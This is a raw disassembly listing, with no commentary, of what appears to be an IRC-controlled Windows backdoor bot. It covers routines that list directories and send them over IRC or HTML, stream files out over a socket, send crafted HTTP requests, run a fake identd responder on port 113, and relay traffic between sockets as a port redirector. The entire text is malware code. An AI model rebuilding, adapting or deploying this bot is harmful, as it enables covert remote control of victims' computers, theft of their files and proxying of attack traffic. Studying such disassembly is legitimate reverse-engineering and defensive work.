push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41EC30
add esp, 1Ch
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4E3018 ; send
loc_41047A: ; CODE XREF: sub_410287+17D�j
; sub_410287+18B�j
lea eax, [ebp+var_388]
push eax
push edi
call ds:off_4F53F0
lea ecx, [ebp+var_388]
mov [ebp+arg_0], eax
push ecx
push eax
call ds:off_4F53EC
test eax, eax
jz loc_410871
mov edi, 1FFh
loc_4104A6: ; CODE XREF: sub_410287+5E4�j
cmp [ebp+var_388], ebx
jz loc_410859
lea eax, [ebp+var_35C]
push offset a__ ; ".."
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_410859
lea eax, [ebp+var_35C]
push offset a__1 ; "."
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_410859
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_374]
push eax
call ds:dword_4F53E8 ; FileTimeToLocalFileTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
call ds:dword_4F53E4 ; FileTimeToSystemTime
mov ax, [ebp+var_10]
mov ecx, offset aPm_0 ; "PM"
cmp ax, 0Ch
ja loc_4105A3
mov ecx, offset aAm ; "AM"
movzx eax, ax
loc_410522: ; CODE XREF: sub_410287+322�j
push ecx
movzx ecx, [ebp+var_E]
push ecx
push eax
movzx eax, [ebp+var_18]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_16]
push eax
lea eax, [ebp+var_48]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_41EA60
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_4106DA
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_4105AE
lea eax, [ebp+var_35C]
push eax
push offset aS_16 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_41EC30
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push esi
push eax
call sub_41EC30
add esp, 28h
jmp loc_41082A
; ---------------------------------------------------------------------------
loc_4105A3: ; CODE XREF: sub_410287+28D�j
movzx eax, ax
sub eax, 0Ch
jmp loc_410522
; ---------------------------------------------------------------------------
loc_4105AE: ; CODE XREF: sub_410287+2D5�j
cmp [ebp+arg_C], ebx
jz loc_410698
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_41EC30
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4E3018 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_3 ; "%s%s/"
push edi
push eax
call sub_41EC30
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4E3018 ; send
lea eax, [ebp+var_35C]
push eax
call sub_41BC70
cmp eax, 1Eh
pop ecx
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
jbe short loc_410654
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_410659
; ---------------------------------------------------------------------------
loc_410654: ; CODE XREF: sub_410287+3C4�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_410659: ; CODE XREF: sub_410287+3CB�j
push edi
push eax
call sub_41EC30
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4E3018 ; send
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_41081B
; ---------------------------------------------------------------------------
loc_410698: ; CODE XREF: sub_410287+32A�j
lea eax, [ebp+var_35C]
push eax
push offset aS_17 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_41EC30
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_4106C5: ; CODE XREF: sub_410287+47B�j
lea eax, [ebp+var_248]
push esi
push eax
call sub_41EC30
add esp, 24h
jmp loc_41082A
; ---------------------------------------------------------------------------
loc_4106DA: ; CODE XREF: sub_410287+2C9�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_410704
push ebx
push [ebp+var_368]
call sub_41727E
push eax
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_4106C5
; ---------------------------------------------------------------------------
loc_410704: ; CODE XREF: sub_410287+459�j
cmp [ebp+arg_C], ebx
jz loc_410804
push 0E6h
push offset aTrTdWidthDAH_0 ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_41EC30
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4E3018 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_4 ; "%s%s"
push edi
push eax
call sub_41EC30
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4E3018 ; send
lea eax, [ebp+var_35C]
push eax
call sub_41BC70
cmp eax, 1Fh
pop ecx
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
jbe short loc_4107AA
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_4107AF
; ---------------------------------------------------------------------------
loc_4107AA: ; CODE XREF: sub_410287+51A�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_4107AF: ; CODE XREF: sub_410287+521�j
push edi
push eax
call sub_41EC30
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4E3018 ; send
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+var_248]
push edi
push eax
call sub_41EC30
add esp, 1Ch
jmp short loc_41082A
; ---------------------------------------------------------------------------
loc_410804: ; CODE XREF: sub_410287+480�j
push [ebp+var_368]
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push esi
loc_41081B: ; CODE XREF: sub_410287+40C�j
lea eax, [ebp+var_248]
push eax
call sub_41EC30
add esp, 18h
loc_41082A: ; CODE XREF: sub_410287+317�j
; sub_410287+44E�j ...
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4E3018 ; send
cmp [ebp+arg_8], ebx
jz short loc_410859
push 7D0h
call ds:dword_4F534C ; Sleep
loc_410859: ; CODE XREF: sub_410287+225�j
; sub_410287+240�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+arg_0]
call ds:off_4F53EC
test eax, eax
jnz loc_4104A6
loc_410871: ; CODE XREF: sub_410287+214�j
push [ebp+arg_0]
call ds:off_4F53E0
cmp [ebp+arg_8], ebx
jz short loc_4108B4
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_41727E
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_41727E
pop ecx
pop ecx
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_41EA60
add esp, 14h
jmp short loc_4108E2
; ---------------------------------------------------------------------------
loc_4108B4: ; CODE XREF: sub_410287+5F6�j
cmp [ebp+arg_C], ebx
lea eax, [ebp+var_248]
jz short loc_4108CE
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_41EA60
pop ecx
pop ecx
jmp short loc_4108E2
; ---------------------------------------------------------------------------
loc_4108CE: ; CODE XREF: sub_410287+636�j
push [ebp+var_8]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_41EA60
add esp, 10h
loc_4108E2: ; CODE XREF: sub_410287+62B�j
; sub_410287+645�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4E3018 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_410287 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410908 proc near ; CODE XREF: sub_40FE5C+135�p
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
call ds:off_4F53C0
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_4109C0
push esi
push ebx
call ds:off_4F53DC
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_4109B9
loc_41094D: ; CODE XREF: sub_410908+AF�j
push 400h
lea eax, [ebp+var_404]
push esi
push eax
call sub_41E4B0
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_41096A
mov edi, [ebp+arg_4]
loc_41096A: ; CODE XREF: sub_410908+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
call ds:off_4F53F4
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_404]
push edi
push eax
push ebx
call ds:off_4F53BC
push esi
lea eax, [ebp+var_404]
push edi
push eax
push [ebp+arg_0]
call ds:dword_4E3018 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4109B4
call ds:dword_4E2F5C ; WSAGetLastError
cmp eax, 2733h
jnz short loc_4109B9
xor eax, eax
loc_4109B4: ; CODE XREF: sub_410908+9B�j
sub [ebp+arg_4], eax
jnz short loc_41094D
loc_4109B9: ; CODE XREF: sub_410908+43�j
; sub_410908+A8�j
push ebx
call ds:off_4F533C
loc_4109C0: ; CODE XREF: sub_410908+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_410908 endp
; =============== S U B R O U T I N E =======================================
sub_4109C5 proc near ; CODE XREF: sub_40FFD8+17B�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_41BC70
test eax, eax
pop ecx
jbe short loc_4109EE
loc_4109D8: ; CODE XREF: sub_4109C5+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_4109E2
mov byte ptr [esi+edi], 2Fh
loc_4109E2: ; CODE XREF: sub_4109C5+17�j
push edi
inc esi
call sub_41BC70
cmp esi, eax
pop ecx
jb short loc_4109D8
loc_4109EE: ; CODE XREF: sub_4109C5+11�j
mov eax, edi
pop edi
pop esi
retn
sub_4109C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4109F3 proc near ; CODE XREF: sub_401C87+531D�p
var_4A0 = byte ptr -4A0h
var_310 = byte ptr -310h
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp+var_4A0]
push edi
push eax
push 101h
call ds:dword_4E2F38 ; WSAStartup
push 6
push 1
push 2
call ds:dword_4E3048 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_14]
call ds:dword_4E2FC8 ; htons
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_40AD91
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_4E2F70 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_410AD0
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_410A6C
mov eax, offset dword_4E5D10
loc_410A6C: ; CODE XREF: sub_4109F3+72�j
push esi
mov esi, 100h
push [ebp+arg_10]
push eax
lea eax, [ebp+var_110]
push [ebp+arg_1C]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi
push eax
call sub_41EC30
add esp, 1Ch
lea eax, [ebp+var_110]
push edi
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_110]
push eax
push ebx
call ds:dword_4E3018 ; send
push esi
lea eax, [ebp+var_110]
push edi
push eax
call sub_41FBF0
add esp, 0Ch
lea eax, [ebp+var_110]
push edi
push esi
push eax
push ebx
call ds:dword_4E2FE0 ; recv
pop esi
loc_410AD0: ; CODE XREF: sub_4109F3+6B�j
push ebx
call ds:dword_4E3060 ; closesocket
call ds:dword_4E2F20 ; WSACleanup
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_310]
push eax
call sub_41EA60
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_410B10
push edi
lea eax, [ebp+var_310]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_410B10: ; CODE XREF: sub_4109F3+102�j
pop edi
pop ebx
leave
retn
sub_4109F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_410B14 proc near ; DATA XREF: sub_401404+430�o
; sub_401C87+4340�o
var_238 = byte ptr -238h
var_38 = byte ptr -38h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 238h
push ebx
push esi
push edi
push 10h
pop edi
xor esi, esi
push edi
lea eax, [ebp+var_1C]
push esi
push eax
mov [ebp+var_8], esi
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_1C], 2
push 71h
call ds:dword_4E2FC8 ; htons
push esi
push 1
push 2
mov [ebp+var_1A], ax
mov [ebp+var_18], esi
call ds:dword_4E3048 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_410C75
mov eax, [ebp+arg_0]
push edi
imul eax, 234h
mov ds:dword_455F0C[eax], ebx
lea eax, [ebp+var_1C]
push eax
push ebx
call ds:dword_4E2FF4 ; bind
cmp eax, 0FFFFFFFFh
jz loc_410C75
push 5
push ebx
call ds:dword_4E2FF0 ; listen
cmp eax, 0FFFFFFFFh
jz loc_410C75
mov [ebp+var_C], edi
mov edi, 200h
loc_410B9F: ; CODE XREF: sub_410B14+EA�j
; sub_410B14+14A�j ...
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
call ds:dword_4E305C ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_410C70
movzx eax, [ebp+var_2A]
push eax
push [ebp+var_28]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_238]
push offset dword_44AEB8
push eax
call sub_41EA60
lea eax, [ebp+var_238]
push eax
call sub_415A3C
add esp, 14h
lea eax, [ebp+var_238]
push esi
push edi
push eax
push [ebp+var_4]
call ds:dword_4E2FE0 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_410B9F
lea eax, [ebp+var_238]
push esi
push eax
call sub_418A5E
push 0Ch
lea eax, [ebp+var_38]
push esi
push eax
call sub_41E4B0
push esi
push esi
lea eax, [ebp+var_38]
push 2
push eax
call sub_40B38F
push eax
push offset aUseridUnixS ; " : USERID : UNIX : %s\r\n"
lea eax, [ebp+var_238]
push edi
push eax
call sub_41EC30
add esp, 34h
lea eax, [ebp+var_238]
push esi
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_238]
push eax
push [ebp+var_4]
call ds:dword_4E3018 ; send
cmp eax, 0FFFFFFFFh
jz loc_410B9F
mov [ebp+var_8], 1
jmp loc_410B9F
; ---------------------------------------------------------------------------
loc_410C70: ; CODE XREF: sub_410B14+A0�j
cmp [ebp+var_8], esi
jnz short loc_410C9C
loc_410C75: ; CODE XREF: sub_410B14+47�j
; sub_410B14+6B�j ...
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_238]
push offset dword_44AEFC
push eax
call sub_41EA60
lea eax, [ebp+var_238]
push eax
call sub_415A3C
add esp, 10h
loc_410C9C: ; CODE XREF: sub_410B14+15F�j
push ebx
call ds:dword_4E3060 ; closesocket
push [ebp+var_4]
call ds:dword_4E3060 ; closesocket
push [ebp+arg_0]
call sub_40B9A7
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
pop ebx
sub_410B14 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_410CBF proc near ; DATA XREF: sub_401C87+61ED�o
var_350 = byte ptr -350h
var_150 = byte ptr -150h
var_14C = dword ptr -14Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = byte ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 350h
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_150]
push 10h
rep movsd
pop edi
mov dword ptr [eax+120h], 1
xor esi, esi
push edi
lea eax, [ebp+var_14]
push esi
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_44]
call ds:dword_4E2FC8 ; htons
push 6
push 1
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
mov [ebp+var_4], edi
call ds:dword_4E3048 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_410E2A
mov ecx, [ebp+var_40]
push 1
imul ecx, 234h
push 401h
push esi
push eax
mov ds:dword_455F0C[ecx], eax
call ds:dword_4E2ED8 ; WSAAsyncSelect
lea eax, [ebp+var_14]
push edi
push eax
push [ebp+arg_0]
call ds:dword_4E2FF4 ; bind
test eax, eax
jnz loc_410E2A
push 0Ah
push [ebp+arg_0]
call ds:dword_4E2FF0 ; listen
test eax, eax
jnz loc_410E2A
loc_410D6F: ; CODE XREF: sub_410CBF+C6�j
; sub_410CBF+166�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
call ds:dword_4E305C ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_410D6F
movzx eax, [ebp+var_26]
push [ebp+var_40]
mov [ebp+var_14C], edi
mov [ebp+var_30], esi
push eax
push [ebp+var_24]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_350]
push offset unk_44AF28
push eax
call sub_41EA60
push edi
lea eax, [ebp+var_350]
push 18h
push eax
call sub_40B691
mov [ebp+var_3C], eax
imul eax, 234h
mov ecx, [ebp+var_40]
add esp, 20h
mov ds:dword_455F04[eax], ecx
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_150]
push esi
push eax
push offset sub_410E4F
push esi
push esi
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_3C]
imul ecx, 234h
cmp eax, esi
mov ds:dword_455F14[ecx], eax
jnz short loc_410E20
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44AF70
call sub_415AB0
pop ecx
pop ecx
jmp short loc_410E2D
; ---------------------------------------------------------------------------
loc_410E18: ; CODE XREF: sub_410CBF+164�j
push 32h
call ds:dword_4F534C ; Sleep
loc_410E20: ; CODE XREF: sub_410CBF+142�j
cmp [ebp+var_30], esi
jz short loc_410E18
jmp loc_410D6F
; ---------------------------------------------------------------------------
loc_410E2A: ; CODE XREF: sub_410CBF+63�j
; sub_410CBF+97�j ...
mov edi, [ebp+arg_0]
loc_410E2D: ; CODE XREF: sub_410CBF+157�j
push edi
call ds:dword_4E3060 ; closesocket
push [ebp+arg_0]
call ds:dword_4E3060 ; closesocket
push [ebp+var_40]
call sub_40B9A7
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_410CBF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_410E4F proc near ; DATA XREF: sub_410CBF+124�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_41EF80
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
mov ebx, [ebp+var_30]
xor ecx, ecx
inc ecx
push 6
push ecx
push 2
mov [eax+120h], ecx
mov [ebp+var_4], ebx
call ds:dword_4E3048 ; socket
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_410FB2
push 10h
lea eax, [ebp+var_18]
push edi
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_18], 2
push [ebp+var_3C]
call ds:dword_4E2FC8 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call ds:dword_4E3008 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_410EDF
lea eax, [ebp+var_13C]
push eax
call ds:dword_4E304C ; gethostbyname
jmp short loc_410EED
; ---------------------------------------------------------------------------
loc_410EDF: ; CODE XREF: sub_410E4F+7F�j
push 2
lea eax, [ebp+var_8]
push 4
push eax
call ds:dword_4E2F80 ; gethostbyaddr
loc_410EED: ; CODE XREF: sub_410E4F+8E�j
cmp eax, edi
jz loc_410FB2
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_4E2F70 ; connect
cmp eax, 0FFFFFFFFh
jz loc_410FB2
movzx eax, [ebp+var_16]
push [ebp+var_34]
mov [ebp+var_20], edi
push eax
push [ebp+var_14]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_344]
push offset unk_44AFB0
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_344]
push 18h
push eax
call sub_40B691
imul ebx, 234h
mov [ebp+var_30], eax
imul eax, 234h
mov ecx, [ebp+var_34]
lea esi, dword_455F0C[ebx]
mov ds:dword_455F04[eax], ecx
add esp, 20h
mov ecx, [esi]
mov ds:dword_455F10[eax], ecx
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_144]
push edi
push eax
push offset sub_411037
push edi
push edi
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, edi
mov ds:dword_455F14[ecx], eax
jnz short loc_410FEB
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44AFF8
call sub_415AB0
pop ecx
pop ecx
loc_410FB2: ; CODE XREF: sub_410E4F+44�j
; sub_410E4F+A0�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push ds:dword_455F0C[eax]
call ds:dword_4E3060 ; closesocket
push [ebp+arg_0]
call ds:dword_4E3060 ; closesocket
push [ebp+var_4]
call sub_40B9A7
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
pop ebx
loc_410FE3: ; CODE XREF: sub_410E4F+19F�j
push 32h
call ds:dword_4F534C ; Sleep
loc_410FEB: ; CODE XREF: sub_410E4F+14E�j
cmp [ebp+var_20], edi
jz short loc_410FE3
mov ebx, 1000h
loc_410FF5: ; CODE XREF: sub_410E4F+1E1�j
push ebx
lea eax, [ebp+var_1344]
push edi
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_1344]
push edi
push ebx
push eax
push dword ptr [esi]
call ds:dword_4E2FE0 ; recv
cmp eax, edi
jle short loc_410FB2
push edi
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call ds:dword_4E3018 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_410FF5
jmp loc_410FB2
sub_410E4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411037 proc near ; DATA XREF: sub_410E4F+130�o
var_1128 = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_41EF80
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_41106E: ; CODE XREF: sub_411037+7C�j
push edi
lea eax, [ebp+var_1128]
push 0
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_1128]
push 0
push edi
push eax
push ds:dword_455F10[esi]
call ds:dword_4E2FE0 ; recv
test eax, eax
jle short loc_4110B5
push 0
push eax
lea eax, [ebp+var_1128]
push eax
push ds:dword_455F0C[esi]
call ds:dword_4E3018 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_41106E
loc_4110B5: ; CODE XREF: sub_411037+61�j
push ds:dword_455F10[esi]
call ds:dword_4E3060 ; closesocket
push [ebp+var_14]
call sub_40B9A7
pop ecx
push 0
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_411037 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4110D4 proc near ; DATA XREF: sub_411349+1BE�o
var_3D4 = byte ptr -3D4h
var_350 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
var_B0 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_3D4]
inc ebx
rep movsd
mov [eax+1DCh], ebx
mov eax, [ebp+var_208]
mov [ebp+arg_0], eax
imul eax, 234h
lea esi, dword_455F0C[eax]
xor edi, edi
mov [ebp+var_C], 1Eh
mov [ebp+var_8], edi
mov eax, [esi]
mov [ebp+var_1F4], ebx
mov [ebp+var_1F0], eax
lea eax, [ebp+var_C]
push eax
push edi
lea eax, [ebp+var_1F4]
push edi
push eax
push edi
call ds:dword_4E2FB0 ; select
test eax, eax
jnz short loc_411158
push dword ptr [esi]
call ds:dword_4E3060 ; closesocket
push [ebp+arg_0]
call sub_40B9A7
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_411158: ; CODE XREF: sub_4110D4+6A�j
push edi
lea eax, [ebp+var_3C]
push ebx
push eax
push dword ptr [esi]
call ds:dword_4E2FE0 ; recv
lea eax, [ebp+var_2C]
push 10h
push eax
push dword ptr [esi]
call sub_4112D9
lea eax, [ebp+var_4C]
push 10h
push eax
push dword ptr [esi]
call sub_4112D9
lea eax, [ebp+var_F0]
push 40h
push eax
push dword ptr [esi]
call sub_4112D9
add esp, 24h
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_1C]
push eax
push dword ptr [esi]
call ds:dword_4E2F1C ; getpeername
test eax, eax
jz short loc_4111D1
call ds:dword_4E2F5C ; WSAGetLastError
push eax
push offset unk_44B038
call sub_415AB0
